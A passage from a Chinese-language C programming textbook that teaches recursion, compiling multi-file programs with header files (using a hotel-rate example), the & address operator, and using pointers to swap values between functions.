} 591 9.3 递归 C允许函数调用它自己,这种调用过程称为递归(recursion)。递归有 时难以捉摸,有时却很方便实用。结束递归是使用递归的难点,因为如果递 归代码中没有终止递归的条件测试部分,一个调用自己的函数会无限递归。 可以使用循环的地方通常都可以使用递归。有时用循环解决问题比较 好,但有时用递归更好。递归方案更简洁,但效率却没有循环高。 9.3.1 演示递归 我们通过一个程序示例,来学习什么是递归。程序清单 9.6 中的 main() 函数调用 up_and_down()函数,这次调用称为“第1级递归”。然后 up_and_down()调用自己,这次调用称为“第2级递归”。接着第2级递归调用 第3级递归,以此类推。该程序示例共有4级递归。为了进一步深入研究递归 时发生了什么,程序不仅显示了变量n的值,还显示了储存n的内存地址 &n(。本章稍后会详细讨论&运算符,printf()函数使用%p转换说明打印地 址,如果你的系统不支持这种格式,请使用%u或%lu代替%p)。 程序清单9.6 recur.c程序 /* recur.c -- 递归演示 */ #include <stdio.h> void up_and_down(int); int main(void) { up_and_down(1); return 0; 592 } void up_and_down(int n) { printf("Level %d: n location %p\n", n, &n); // #1 if (n < 4) up_and_down(n + 1); printf("LEVEL %d: n location %p\n", n, &n); // #2 } 下面是在我们系统中的输出: Level 1: n location 0x0012ff48 Level 2: n location 0x0012ff3c Level 3: n location 0x0012ff30 Level 4: n location 0x0012ff24 LEVEL 4: n location 0x0012ff24 LEVEL 3: n location 0x0012ff30 LEVEL 2: n location 0x0012ff3c LEVEL 1: n location 0x0012ff48 我们来仔细分析程序中的递归是如何工作的。首先,main()调用了带参 数1的up_and_down()函数,执行结果是up_and_down()中的形式参数n的值是 1,所以打印语句#1打印Level 1。然后,由于n小于4,up_and_down()(第1 593 级)调用实际参数为n + 1(或2)的up_and_down()(第2级)。于是第2级调 用中的n的值是2,打印语句#1打印Level 2。与此类似,下面两次调用打印的 分别是Level 3和Level 4。 当执行到第4级时,n的值是4,所以if测试条件为假。up_and_down()函 数不再调用自己。第4级调用接着执行打印语句#2,即打印LEVEL 4,因为n 的值是4。此时,第4级调用结束,控制被传回它的主调函数(即第3级调 用)。在第3级调用中,执行的最后一条语句是调用if语句中的第4级调用。 被调函数(第4级调用)把控制返回在这个位置,因此,第3级调用继续执行 后面的代码,打印语句#2打印LEVEL 3。然后第3级调用结束,控制被传回 第2级调用,接着打印LEVEL 2,以此类推。 注意,每级递归的变量 n 都属于本级递归私有。这从程序输出的地址值 可以看出(当然,不同的系统表示的地址格式不同,这里关键要注意, Level 1和LEVEL 1的地址相同,Level 2和LEVEL 2的地址相同,等等)。 如果觉得不好理解,可以假设有一条函数调用链——fun1()调用 fun2()、fun2()调用 fun3()、fun3()调用fun4()。当 fun4()结束时,控制传回 fun3();当fun3()结束时,控制传回 fun2();当fun2()结束时,控制传回 fun1()。递归的情况与此类似,只不过fun1()、fun2()、fun3()和fun4()都是相同 的函数。 9.3.2 递归的基本原理 初次接触递归会觉得较难理解。为了帮助读者理解递归过程,下面以程 序清单9.6为例讲解几个要点。 第1,每级函数调用都有自己的变量。也就是说,第1级的n和第2级的n 不同,所以程序创建了4个单独的变量,每个变量名都是n,但是它们的值各 不相同。当程序最终返回 up_and_down()的第1 级调用时,最初的n仍然是它 的初值1(见图9.4)。 594 图9.4 递归中的变量 第2,每次函数调用都会返回一次。当函数执行完毕后,控制权将被传 回上一级递归。程序必须按顺序逐级返回递归,从某级up_and_down()返回 上一级的up_and_down(),不能跳级回到main()中的第1级调用。 第3,递归函数中位于递归调用之前的语句,均按被调函数的顺序执 行。例如,程序清单9.6中的打印语句#1位于递归调用之前,它按照递归的 顺序:第1级、第2级、第3级和第4级,被执行了4次。 第4,递归函数中位于递归调用之后的语句,均按被调函数相反的顺序 执行。例如,打印语句#2位于递归调用之后,其执行的顺序是第4级、第3 级、第2级、第1级。递归调用的这种特性在解决涉及相反顺序的编程问题时 很有用。稍后将介绍一个这样的例子。 第5,虽然每级递归都有自己的变量,但是并没有拷贝函数的代码。程 序按顺序执行函数中的代码,而递归调用就相当于又从头开始执行函数的代 码。除了为每次递归调用创建变量外,递归调用非常类似于一个循环语句。 实际上,递归有时可用循环来代替,循环有时也能用递归来代替。 595 最后,递归函数必须包含能让递归调用停止的语句。通常,递归函数都 使用if或其他等价的测试条件在函数形参等于某特定值时终止递归。为此, 每次递归调用的形参都要使用不同的值。例如,程序清单9.6中的 up_and_down(n)调用up_and_down(n+1)。最终,实际参数等于4时,if的测试 条件(n < 4)为假。 9.3.3 尾递归 最简单的递归形式是把递归调用置于函数的末尾,即正好在 return 语句 之前。这种形式的递归被称为尾递归(tail recursion),因为递归调用在函 数的末尾。尾递归是最简单的递归形式,因为它相当于循环。 下面要介绍的程序示例中,分别用循环和尾递归计算阶乘。一个正整数 的阶乘(factorial)是从1到该整数的所有整数的乘积。例如,3的阶乘(写 作3!)是1×2×3。另外,0!等于1,负数没有阶乘。程序清单9.7中,第1个 函数使用for循环计算阶乘,第2个函数使用递归计算阶乘。 程序清单9.7 factor.c程序 // factor.c -- 使用循环和递归计算阶乘 #include <stdio.h> long fact(int n); long rfact(int n); int main(void) { int num; printf("This program calculates factorials.\n"); 596 printf("Enter a value in the range 0-12 (q to quit):\n"); while (scanf("%d", &num) == 1) { if (num < 0) printf("No negative numbers, please.\n"); else if (num > 12) printf("Keep input under 13.\n"); else { printf("loop: %d factorial = %ld\n", num, fact(num)); printf("recursion: %d factorial = %ld\n", num, rfact(num)); } printf("Enter a value in the range 0-12 (q to quit):\n"); } printf("Bye.\n"); return 0; } 597 long fact(int n)   // 使用循环的函数 { long ans; for (ans = 1; n > 1; n--) ans *= n; return 
ans; } long rfact(int n)  // 使用递归的函数 { long ans; if (n > 0) ans = n * rfact(n - 1); else ans = 1; return ans; } 测试驱动程序把输入限制在0~12。因为12!已快接近5亿,而13!比62亿 还大,已超过我们系统中long类型能表示的范围。要计算超过12的阶乘,必 须使用能表示更大范围的类型,如double或long long。 下面是该程序的运行示例: 598 This program calculates factorials. Enter a value in the range 0-12 (q to quit): 5 loop: 5 factorial = 120 recursion: 5 factorial = 120 Enter a value in the range 0-12 (q to quit): 10 loop: 10 factorial = 3628800 recursion: 10 factorial = 3628800 Enter a value in the range 0-12 (q to quit): q Bye. 使用循环的函数把ans初始化为1,然后把ans与从n~2的所有递减整数相 乘。根据阶乘的公式,还应该乘以1,但是这并不会改变结果。 现在考虑使用递归的函数。该函数的关键是n! = n×(n-1)!。可以这样做 是因为(n-1)!是n-1~1的所有正整数的乘积。因此,n乘以n-1就得到n的阶乘。 阶乘的这一特性很适合使用递归。如果调用函数rfact(),rfact(n)是 n*rfact(n- 1)。因此,通过调用 rfact(n-1)来计算rfact(n),如程序清单9.7中所示。当 然,必须要在满足某条件时结束递归,可以在n等于0时把返回值设为1。 程序清单9.7中使用递归的输出和使用循环的输出相同。注意,虽然 rfact()的递归调用不是函数的最后一行,但是当n>0时,它是该函数执行的最 后一条语句,因此它也是尾递归。 599 既然用递归和循环来计算都没问题,那么到底应该使用哪一个?一般而 言,选择循环比较好。首先,每次递归都会创建一组变量,所以递归使用的 内存更多,而且每次递归调用都会把创建的一组新变量放在栈中。递归调用 的数量受限于内存空间。其次,由于每次函数调用要花费一定的时间,所以 递归的执行速度较慢。那么,演示这个程序示例的目的是什么?因为尾递归 是递归中最简单的形式,比较容易理解。在某些情况下,不能用简单的循环 代替递归,因此读者还是要好好理解递归。 9.3.4 递归和倒序计算 递归在处理倒序时非常方便(在解决这类问题中,递归比循环简单)。 我们要解决的问题是:编写一个函数,打印一个整数的二进制数。二进制表 示法根据 2 的幂来表示数字。例如,十进制数 234 实际上是 2×102+3×101+4×100,所以二进制数101实际上是1×22+0×21+1×20。二进制数 由0和1表示。 我们要设计一个以二进制形式表示整数的方法或算法(algorithm)。例 如,如何用二进制表示十进制数5?在二进制中,奇数的末尾一定是1,偶数 的末尾一定是0,所以通过5 % 2即可确定5的二进制数的最后一位是1还是 0。一般而言,对于数字n,其二进制的最后一位是n % 2。因此,计算的第 一位数字实际上是待输出二进制数的最后一位。这一规律提示我们,在递归 函数的递归调用之前计算n % 2,在递归调用之后打印计算结果。这样,计 算的第1个值正好是最后一个打印的值。 要获得下一位数字,必须把原数除以 2。这种计算方法相当于在十进制 下把小数点左移一位,如果计算结果是偶数,那么二进制的下一位数就是 0;如果是奇数,就是1。例如,5/2得2(整数除法),2是偶数(2%2 得 0),所以下一位二进制数是 0。到目前为止,我们已经获得 01。继续重复 这个过程。2/2得1,1%2得1,所以下一位二进制数是1。因此,我们得到5 的等价二进制数是101。那么,程序应该何时停止计算?当与2相除的结果小 于2时停止计算,因为只要结果大于或等于2,就说明还有二进制位。每次除 以 2 就相当于去掉一位二进制,直到计算出最后一位为止(如果不好理解, 600 可以拿十进制数来做类比:628%10得8,因此8就是该数最后一位;而 628/10得62,而62%10得2,所以该数的下一位是2,以此类推)。程序清单 9.8演示了上述算法。 程序清单9.8 binary.c程序 /* binary.c -- 以二进制形式打印制整数 */ #include <stdio.h> void to_binary(unsigned long n); int main(void) { unsigned long number; printf("Enter an integer (q to quit):\n"); while (scanf("%lu", &number) == 1) { printf("Binary equivalent: "); to_binary(number); putchar('\n'); printf("Enter an integer (q to quit):\n"); } printf("Done.\n"); return 0; 601 } void to_binary(unsigned long n) /* 递归函数 */ { int r; r = n % 2; if (n >= 2) to_binary(n / 2); putchar(r == 0 ? '0' : '1'); return; } 在该程序中,如果r的值是0,to_binary()函数就显示字符'0';如果r的值 是1,to_binary()函数则显示字符'1'。条件表达式r == 0 ? '0' : '1'用于把数值转 换成字符。 下面是该程序的运行示例: Enter an integer (q to quit): 9 Binary equivalent: 1001 Enter an integer (q to quit): 255 Binary equivalent: 11111111 602 Enter an integer (q to quit): 1024 Binary equivalent: 10000000000 Enter an integer (q to quit): q done. 
不用递归,是否能实现这种用二进制形式表示整数的算法?当然可以。 但是由于这种算法要首先计算最后一位二进制数,所以在显示结果之前必须 把所有的位数都储存在别处(例如,数组)。第 15 章中会介绍一个不用递 归实现该算法的例子。 9.3.5 递归的优缺点 递归既有优点也有缺点。优点是递归为某些编程问题提供了最简单的解 决方案。缺点是一些递归算法会快速消耗计算机的内存资源。另外,递归不 方便阅读和维护。我们用一个例子来说明递归的优缺点。 斐波那契数列的定义如下:第1 个和第2 个数字都是1,而后续的每个数 字都是其前两个数字之和。例如,该数列的前几个数是:1、1、2、3、5、 8、13。斐波那契数列在数学界深受喜爱,甚至有专门研究它的刊物。不 过,这不在本书的讨论范围之内。下面,我们要创建一个函数,接受正整数 n,返回相应的斐波那契数值。 首先,来看递归。递归提供一个简单的定义。如果把函数命名为 Fibonacci(),那么如果n是1或2, Fibonacci(n)应返回1;对于其他数值,则应 返回Fibonacci(n-1)+Fibonacci(n-2): unsigned long Fibonacci(unsigned n) 603 { if (n > 2) return Fibonacci(n-1) + Fibonacci(n-2); else return 1; } 这个递归函数只是重述了数学定义的递归。该函数使用了双递归 (double recursion),即函数每一级递归都要调用本身两次。这暴露了一个 问题。 为了说明这个问题,假设调用 Fibonacci(40)。这是第1 级递归调用,将 创建一个变量 n。然后在该函数中要调用Fibonacci()两次,在第2级递归中要 分别创建两个变量n。这两次调用中的每次调用又会进行两次调用,因而在 第3级递归中要创建4个名为n的变量。此时总共创建了7个变量。由于每级递 归创建的变量都是上一级递归的两倍,所以变量的数量呈指数增长!在第 5 章中介绍过一个计算小麦粒数的例子,按指数增长很快就会产生非常大的 值。在本例中,指数增长的变量数量很快就消耗掉计算机的大量内存,很可 能导致程序崩溃。 虽然这是个极端的例子,但是该例说明:在程序中使用递归要特别注 意,尤其是效率优先的程序。 所有的C函数皆平等 程序中的每个C函数与其他函数都是平等的。每个函数都可以调用其他 函数,或被其他函数调用。这点与Pascal和Modula-2中的过程不同,虽然过 程可以嵌套在另一个过程中,但是嵌套在不同过程中的过程之间不能相互调 用。 604 main()函数是否与其他函数不同?是的,main()的确有点特殊。当 main()与程序中的其他函数放在一起时,最开始执行的是main()函数中的第1 条语句,但是这也是局限之处。main()也可以被自己或其他函数递归调用 ——尽管很少这样做。 605 9.4 编译多源代码文件的程序 使用多个函数最简单的方法是把它们都放在同一个文件中,然后像编译 只有一个函数的文件那样编译该文件即可。其他方法因操作系统而异,下面 将举例说明。 9.4.1 UNIX 假定在UNIX系统中安装了UNIX C编译器cc(最初的cc已经停用,但是 许多UNIX系统都给cc命令起了一个别名用作其他编译器命令,典型的是gcc 或clang)。假设file1.c和file2.c是两个内含C函数的文件,下面的命令将编译 两个文件并生成一个名为a.out的可执行文件: cc file1.c file2.c 另外,还生成两个名为file1.o和file2.o的目标文件。如果后来改动了 file1.c,而file2.c不变,可以使用以下命令编译第1个文件,并与第2个文件 的目标代码合并: cc file1.c file2.o UNIX系统的make命令可自动管理多文件程序,但是这超出了本书的讨 论范围。 注意,OS X的Terminal工具可以打开UNIX命令行环境,但是必须先下 载命令行编译器(GCC和Clang)。 9.4.2 Linux 假定Linux系统安装了GNU C编译器GCC。假设file1.c和file2.c是两个内 含C函数的文件,下面的命令将编译两个文件并生成名为a.out的可执行文 件: gcc file1.c file2.c 606 另外,还生成两个名为file1.o和file2.o的目标文件。如果后来改动了 file1.c,而file2.c不变,可以使用以下命令编译第1个文件,并与第2个文件 的目标代码合并: gcc file1.c file2.o 9.4.3 DOS命令行编译器 绝大多数DOS命令行编译器的工作原理和UNIX的cc命令类似,只不过 使用不同的名称而已。其中一个区别是,对象文件的扩展名是.obj,而不 是.o。一些编译器生成的不是目标代码文件,而是汇编语言或其他特殊代码 的中间文件。 9.4.4 Windows和苹果的IDE编译器 Windows和Macintosh系统使用的集成开发环境中的编译器是面向项目 的。项目(project)描述的是特定程序使用的资源。资源包括源代码文件。 这种IDE中的编译器要创建项目来运行单文件程序。对于多文件程序,要使 用相应的菜单命令,把源代码文件加入一个项目中。要确保所有的源代码文 件都在项目列表中列出。许多IDE都不用在项目列表中列出头文件(即扩展 名为.h的文件),因为项目只管理使用的源代码文件,源代码文件中的 #include指令管理该文件中使用的头文件。但是,Xcode要在项目中添加头文 件。 9.4.5 使用头文件 如果把main()放在第1个文件中,把函数定义放在第2个文件中,那么第 1个文件仍然要使用函数原型。把函数原型放在头文件中,就不用在每次使 用函数文件时都写出函数的原型。C 标准库就是这样做的,例如,把I/O函 数原型放在stdio.h中,把数学函数原型放在math.h中。你也可以这样用自定 义的函数文件。 另外,程序中经常用C预处理器定义符号常量。这种定义只储存了那些 607 包含#define指令的文件。如果把程序的一个函数放进一个独立的文件中,你 也可以使用#define指令访问每个文件。最直接的方法是在每个文件中再次输 入指令,但是这个方法既耗时又容易出错。另外,还会有维护的问题:如果 修改了#define 定义的值,就必须在每个文件中修改。更好的做法是,把 #define 指令放进头文件,然后在每个源文件中使用#include指令包含该文件 即可。 总之,把函数原型和已定义的字符常量放在头文件中是一个良好的编程 习惯。我们考虑一个例子:假设要管理 4 家酒店的客房服务,每家酒店的房 价不同,但是每家酒店所有房间的房价相同。对于预订住宿多天的客户,第 2天的房费是第1天的95%,第3天是第2天的95%,以此类推(暂不考虑这种 策略的经济效益)。设计一个程序让用户指定酒店和入住天数,然后计算并 显示总费用。同时,程序要实现一份菜单,允许用户反复输入数据,除非用 户选择退出。 程序清单9.9、程序清单9.10和程序清单9.11演示了如何编写这样的程 序。第1个程序清单包含main()函数,提供整个程序的组织结构。第 2 个程 序清单包含支持的函数,我们假设这些函数在独立的文件中。最后,程序清 单9.11列出了一个头文件,包含了该程序所有源文件中使用的自定义符号常 量和函数原型。前面介绍过,在UNIX和DOS环境中,#include "hotels.h"指令 中的双引号表明被包含的文件位于当前目录中(通常是包含源代码的目 录)。如果使用IDE,需要知道如何把头文件合并成一个项目。 程序清单9.9 usehotel.c控制模块 /* usehotel.c -- 房间费率程序 */ /* 与程序清单9.10一起编译   */ #include <stdio.h> #include "hotel.h" /* 定义符号常量,声明函数 */ 608 int main(void) { int nights; double hotel_rate; int code; while ((code = menu()) != QUIT) { switch (code) { case 1:  hotel_rate = HOTEL1; break; case 2:  hotel_rate = HOTEL2; break; case 3:  hotel_rate = 
HOTEL3; break; case 4:  hotel_rate = HOTEL4; break; default: hotel_rate = 0.0; printf("Oops!\n"); 609 break; } nights = getnights(); showprice(hotel_rate, nights); } printf("Thank you and goodbye.\n"); return 0; } 程序清单9.10 hotel.c函数支持模块 /* hotel.c -- 酒店管理函数 */ #include <stdio.h> #include "hotel.h" int menu(void) { int code, status; printf("\n%s%s\n", STARS, STARS); printf("Enter the number of the desired hotel:\n"); printf("1) Fairfield Arms        2) Hotel Olympic\n"); printf("3) Chertworthy Plaza     4) The Stockton\n"); 610 printf("5) quit\n"); printf("%s%s\n", STARS, STARS); while ((status = scanf("%d", &code)) != 1 || (code < 1 || code > 5)) { if (status != 1) scanf("%*s"); // 处理非整数输入 printf("Enter an integer from 1 to 5, please.\n"); } return code; } int getnights(void) { int nights; printf("How many nights are needed? "); while (scanf("%d", &nights) != 1) { scanf("%*s");   // 处理非整数输入 printf("Please enter an integer, such as 2.\n"); 611 } return nights; } void showprice(double rate, int nights) { int n; double total = 0.0; double factor = 1.0; for (n = 1; n <= nights; n++, factor *= DISCOUNT) total += rate * factor; printf("The total cost will be $%0.2f.\n", total); } 程序清单9.11 hotel.h头文件 /* hotel.h -- 符号常量和 hotel.c 中所有函数的原型 */ #define QUIT     5 #define HOTEL1  180.00 #define HOTEL2  225.00 #define HOTEL3  255.00 #define HOTEL4  355.00 612 #define DISCOUNT  0.95 #define STARS "**********************************" // 显示选择列表 int menu(void); // 返回预订天数 int getnights(void); // 根据费率、入住天数计算费用 // 并显示结果 void showprice(double rate, int nights); 下面是这个多文件程序的运行示例: ******************************************************************** Enter the number of the desired hotel: 1) Fairfield Arms        2) Hotel Olympic 3) Chertworthy Plaza      4) The Stockton 5) quit ******************************************************************** 3 How many nights are needed? 1 The total cost will be $255.00. 613 ******************************************************************** Enter the number of the desired hotel: 1) Fairfield Arms        2) Hotel Olympic 3) Chertworthy Plaza      4) The Stockton 5) quit ******************************************************************** 4 How many nights are needed? 3 The total cost will be $1012.64. ******************************************************************** Enter the number of the desired hotel: 1) Fairfield Arms        2) Hotel Olympic 3) Chertworthy Plaza      4) The Stockton 5) quit ******************************************************************** 5 Thank you and goodbye. 
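注意 防止头文件被重复包含

随着程序规模增大，同一个头文件往往会被多个源文件包含，甚至被其他头文件间接包含。为避免其中的内容在同一个源文件里被处理多次，常见的做法是给头文件加上“包含保护”（include guard）。下面是 hotel.h 的一种改写示意（这并不是原书程序清单的一部分，宏名 HOTEL_H 也只是约定俗成的选择，可以换成其他不会冲突的名字）：

/* hotel.h -- 加上包含保护的写法（示意） */
#ifndef HOTEL_H     /* 如果尚未定义 HOTEL_H */
#define HOTEL_H     /* 就定义它，并处理下面的内容 */

#define QUIT     5
#define HOTEL1  180.00
#define HOTEL2  225.00
#define HOTEL3  255.00
#define HOTEL4  355.00
#define DISCOUNT  0.95
#define STARS "**********************************"

int menu(void);
int getnights(void);
void showprice(double rate, int nights);

#endif              /* HOTEL_H */

有了这层保护，即使 hotel.h 被同一个源文件直接或间接地包含多次，#ifndef 和 #endif 之间的内容也只会被预处理器处理一次。#ifndef、#define、#endif 这类条件编译指令属于C预处理器的内容，这里只需了解这种惯用写法即可。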
顺带一提,该程序中有几处编写得很巧妙。尤其是,menu()和getnights() 函数通过测试scanf()的返回值来跳过非数值数据,而且调用 scanf("%*s")跳 至下一个空白字符。注意,menu()函数中是如何检查非数值输入和超出范围 614 的数据: while ((status = scanf("%d", &code)) != 1 ||(code < 1 || code > 5)) 以上代码段利用了C语言的两个规则:从左往右对逻辑表达式求值;一 旦求值结果为假,立即停止求值。在该例中,只有在scanf()成功读入一个整 数值后,才会检查code的值。 用不同的函数处理不同的任务时应检查数据的有效性。当然,首次编写 menu()或getnights()函数时可以暂不添加这一功能,只写一个简单的scanf()即 可。待基本版本运行正常后,再逐步改善各模块。 615 9.5 查找地址:&运算符 指针(pointer)是 C 语言最重要的(有时也是最复杂的)概念之一,用 于储存变量的地址。前面使用的scanf()函数中就使用地址作为参数。概括地 说,如果主调函数不使用return返回的值,则必须通过地址才能修改主调函 数中的值。接下来,我们将介绍带地址参数的函数。首先介绍一元&运算符 的用法。 一元&运算符给出变量的存储地址。如果pooh是变量名,那么&pooh是 变量的地址。可以把地址看作是变量在内存中的位置。假设有下面的语句: pooh = 24; 假设pooh的存储地址是0B76(PC地址通常用十六进制形式表示)。那 么,下面的语句: printf("%d %p\n", pooh, &pooh); 将输出如下内容(%p是输出地址的转换说明): 24 0B76 程序清单9.12中使用了这个运算符查看不同函数中的同名变量分别储存 在什么位置。 程序清单9.12 loccheck.c程序 /* loccheck.c -- 查看变量被储存在何处 */ #include <stdio.h> void mikado(int);       /* 函数原型 */ int main(void) 616 { int pooh = 2, bah = 5; /* main()的局部变量 */ printf("In main(), pooh = %d and &pooh = %p\n", pooh,  &pooh); printf("In main(), bah = %d and &bah = %p\n", bah, &bah); mikado(pooh); return 0; } void mikado(int bah)      /* 定义函数 */ { int pooh = 10;       /* mikado()的局部变量 */ printf("In mikado(), pooh = %d and &pooh = %p\n", pooh,  &pooh); printf("In mikado(), bah = %d and &bah = %p\n",  bah,  &bah); } 程序清单9.12中使用ANSI C的%p格式打印地址。我们的系统输出如 下: In main(), pooh = 2 and &pooh = 0x7fff5fbff8e8 In main(), bah = 5 and &bah = 0x7fff5fbff8e4 617 In mikado(), pooh = 10 and &pooh = 0x7fff5fbff8b8 In mikado(), bah = 2 and &bah = 0x7fff5fbff8bc 实现不同,%p表示地址的方式也不同。然而,许多实现都如本例所 示,以十六进制显示地址。顺带一提,每个十六进制数对应4位,该例显示 12个十六进制数,对应48位地址。 该例的输出说明了什么?首先,两个pooh的地址不同,两个bah的地址 也不同。因此,和前面介绍的一样,计算机把它们看成4个独立的变量。其 次,函数调用mikado(pooh)把实际参数(main()中的pooh)的值(2)传递给 形式参数(mikado()中的bah)。注意,这种传递只传递了值。涉及的两个变 量(main()中的pooh和mikado()中的bah)并未改变。 我们强调第2 点,是因为这并不是在所有语言中都成立。例如,在 FORTRAN中,子例程会影响主调例程的原始变量。子例程的变量名可能与 原始变量不同,但是它们的地址相同。但是,在 C语言中不是这样。每个C 函数都有自己的变量。这样做更可取,因为这样做可以防止原始变量被被调 函数中的副作用意外修改。然而,正如下节所述,这也带来了一些麻烦。 618 9.6 更改主调函数中的变量 有时需要在一个函数中更改其他函数的变量。例如,普通的排序任务中 交换两个变量的值。假设要交换两个变量x和y的值。简单的思路是: x = y; y = x; 这完全不起作用,因为执行到第2行时,x的原始值已经被y的原始值替 换了。因此,要多写一行代码,储存x的原始值: temp = x; x = y; y = temp; 上面这 3 行代码便可实现交换值的功能,可以编写成一个函数并构造一 个驱动程序来测试。在程序清单9.13中,为清楚地表明变量属于哪个函数, 在main()中使用变量x和y,在intercharge()中使用u和v。 程序清单9.13 swap1.c程序 /* swap1.c -- 第1个版本的交换函数 */ #include <stdio.h> void interchange(int u, int v); /* 声明函数 */ int main(void) { int x = 5, y = 10; 619 printf("Originally x = %d and y = %d.\n", x, y); interchange(x, y); printf("Now x = %d and y = %d.\n", x, y); return 0; } void interchange(int u, int v) /* 定义函数 */ { int temp; temp = u; u = v; v = temp; } 运行该程序后,输出如下: Originally x = 5 and y = 10. Now x = 5 and y = 10. 两个变量的值并未交换!我们在interchange()中添加一些打印语句来检 查错误(见程序清单9.14)。 程序清单9.14 swap2.c程序 /* swap2.c -- 查找swap1.c的问题 */ 620 #include <stdio.h> void interchange(int u, int v); int main(void) { int x = 5, y = 10; printf("Originally x = %d and y = %d.\n", x, y); interchange(x, y); printf("Now x = %d and y = %d.\n", x, y); return 0; } void interchange(int u, int v) { int temp; printf("Originally u = %d and v = %d.\n", u, v); temp = u; u = v; v = temp; printf("Now u = %d and v = %d.\n", u, v); } 621 下面是该程序的输出: Originally x = 5 and y = 10. Originally u = 5 and v = 10. Now u = 10 and v = 5. Now x = 5 and y = 10. 
看来,interchange()没有问题,它交换了 u 和 v 的值。问题出在把结果 传回 main()时。interchange()使用的变量并不是main()中的变量。因此,交换 u和v的值对x和y的值没有影响!是否能用return语句把值传回main()?当然可 以,在interchange()的末尾加上下面一行语句: return(u); 然后修改main()中的调用: x = interchange(x,y); 这只能改变x的值,而y的值依旧没变。用return语句只能把被调函数中 的一个值传回主调函数,但是现在要传回两个值。这没问题!不过,要使用 指针。 622 9.7 指针简介 指针?什么是指针?从根本上看,指针(pointer)是一个值为内存地址 的变量(或数据对象)。正如char类型变量的值是字符,int类型变量的值是 整数,指针变量的值是地址。在C语言中,指针有许多用法。本章将介绍如 何把指针作为函数参数使用,以及为何要这样用。 假设一个指针变量名是ptr,可以编写如下语句: ptr = &pooh; // 把pooh的地址赋给ptr 对于这条语句,我们说ptr“指向”pooh。ptr和&pooh的区别是ptr是变量, 而&pooh是常量。或者,ptr是可修改的左值,而&pooh是右值。还可以把ptr 指向别处: ptr = &bah; // 把ptr指向bah,而不是pooh 现在ptr的值是bah的地址。 要创建指针变量,先要声明指针变量的类型。假设想把ptr声明为储存 int类型变量地址的指针,就要使用下面介绍的新运算符。 9.7.1 间接运算符:* 假设已知ptr指向bah,如下所示: ptr = &bah; 然后使用间接运算符*(indirection operator)找出储存在bah中的值,该 运算符有时也称为解引用运算符(dereferencing operator)。不要把间接运算 符和二元乘法运算符(*)混淆,虽然它们使用的符号相同,但语法功能不 同。 val = *ptr; // 找出ptr指向的值 623 语句ptr = &bah;和val = *ptr;放在一起相当于下面的语句: val = bah; 由此可见,使用地址和间接运算符可以间接完成上面这条语句的功能, 这也是“间接运算符”名称的由来。 小结:与指针相关的运算符 地址运算符:& 一般注解: 后跟一个变量名时,&给出该变量的地址。 示例: &nurse表示变量nurse的地址。 地址运算符:* 一般注解: 后跟一个指针名或地址时,*给出储存在指针指向地址上的值。 示例: nurse = 22; ptr = &nurse; // 指向nurse的指针 val = *ptr;  // 把ptr指向的地址上的值赋给val 执行以上3条语句的最终结果是把22赋给val。 9.7.2 声明指针 624 相信读者已经很熟悉如何声明int类型和其他基本类型的变量,那么如何 声明指针变量?你也许认为是这样声明: pointer ptr; // 不能这样声明指针 为什么不能这样声明?因为声明指针变量时必须指定指针所指向变量的 类型,因为不同的变量类型占用不同的存储空间,一些指针操作要求知道操 作对象的大小。另外,程序必须知道储存在指定地址上的数据类型。long和 float可能占用相同的存储空间,但是它们储存数字却大相径庭。下面是一些 指针的声明示例: int * pi;   // pi是指向int类型变量的指针 char * pc;    // pc是指向char类型变量的指针 float * pf, * pg; // pf、pg都是指向float类型变量的指针 类型说明符表明了指针所指向对象的类型,星号(*)表明声明的变量 是一个指针。int * pi;声明的意思是pi是一个指针,*pi是int类型(见图 9.5)。 625 图9.5 声明并使用指针 *和指针名之间的空格可有可无。通常,程序员在声明时使用空格,在 解引用变量时省略空格。 pc指向的值(*pc)是char类型。pc本身是什么类型?我们描述它的类型 是“指向char类型的指针”。pc 的值是一个地址,在大部分系统内部,该地址 由一个无符号整数表示。但是,不要把指针认为是整数类型。一些处理整数 的操作不能用来处理指针,反之亦然。例如,可以把两个整数相乘,但是不 能把两个指针相乘。所以,指针实际上是一个新类型,不是整数类型。因 此,如前所述,ANSI C专门为指针提供了%p格式的转换说明。 9.7.3 使用指针在函数间通信 我们才刚刚接触指针,指针的世界丰富多彩。本节着重介绍如何使用指 针解决函数间的通信问题。请看程序清单9.15,该程序在interchange()函数中 使用了指针参数。稍后我们将对该程序做详细分析。 程序清单9.15 swap3.c程序 /* swap3.c -- 使用指针解决交换函数的问题 */ #include <stdio.h> void interchange(int * u, int * v); int main(void) { int x = 5, y = 10; printf("Originally x = %d and y = %d.\n", x, y); interchange(&x, &y);  // 把地址发送给函数 626 printf("Now x = %d and y = %d.\n", x, y); return 0; } void interchange(int * u, int * v) { int temp; temp = *u;  // temp获得 u 所指向对象的值 *u = *v; *v = temp; } 该程序是否能正常运行?下面是程序的输出: Originally x = 5 and y = 10. Now x = 10 and y = 5. 
没问题,一切正常。接下来,我们分析程序清单9.15的运行情况。首先 看函数调用: interchange(&x, &y); 该函数传递的不是x和y的值,而是它们的地址。这意味着出现在 interchange()原型和定义中的形式参数u和v将把地址作为它们的值。因此, 应把它们声明为指针。由于x和y是整数,所以u和v是指向整数的指针,其声 明如下: 627 void interchange (int * u, int * v) 接下来,在函数体中声明了一个交换值时必需的临时变量: int temp; 通过下面的语句把x的值储存在temp中: temp = *u; 记住,u的值是&x,所以u指向x。这意味着用*u即可表示x的值,这正是 我们需要的。不要写成这样: temp = u; /* 不要这样做 */ 因为这条语句赋给temp的是x的地址(u的值就是x的地址),而不是x的 值。函数要交换的是x和y的值,而不是它们的地址。 与此类似,把y的值赋给x,要使用下面的语句: *u = *v; 这条语句相当于: x = y; 我们总结一下该程序示例做了什么。我们需要一个函数交换x和y的值。 把x和y的地址传递给函数,我们让interchange()访问这两个函数。使用指针 和*运算符,该函数可以访问储存在这些位置的值并改变它们。 可以省略ANSI C风格的函数原型中的形参名,如下所示: void interchange(int *, int *); 一般而言,可以把变量相关的两类信息传递给函数。如果这种形式的函 数调用,那么传递的是x的值: 628 function1(x); 如果下面形式的函数调用,那么传递的是x的地址: function2(&x); 第1种形式要求函数定义中的形式参数必须是一个与x的类型相同的变 量: int function1(int num) 第2种形式要求函数定义中的形式参数必须是一个指向正确类型的指 针: int function2(int * ptr) 如果要计算或处理值,那么使用第 1 种形式的函数调用;如果要在被调 函数中改变主调函数的变量,则使用第2种形式的函数调用。我们用过的 scanf()函数就是这样。当程序要把一个值读入变量时(如本例中的num), 调用的是scanf("%d", &num)。scanf()读取一个值,然后把该值储存到指定的 地址上。 对本例而言,指针让interchange()函数通过自己的局部变量改变main()中 变量的值。 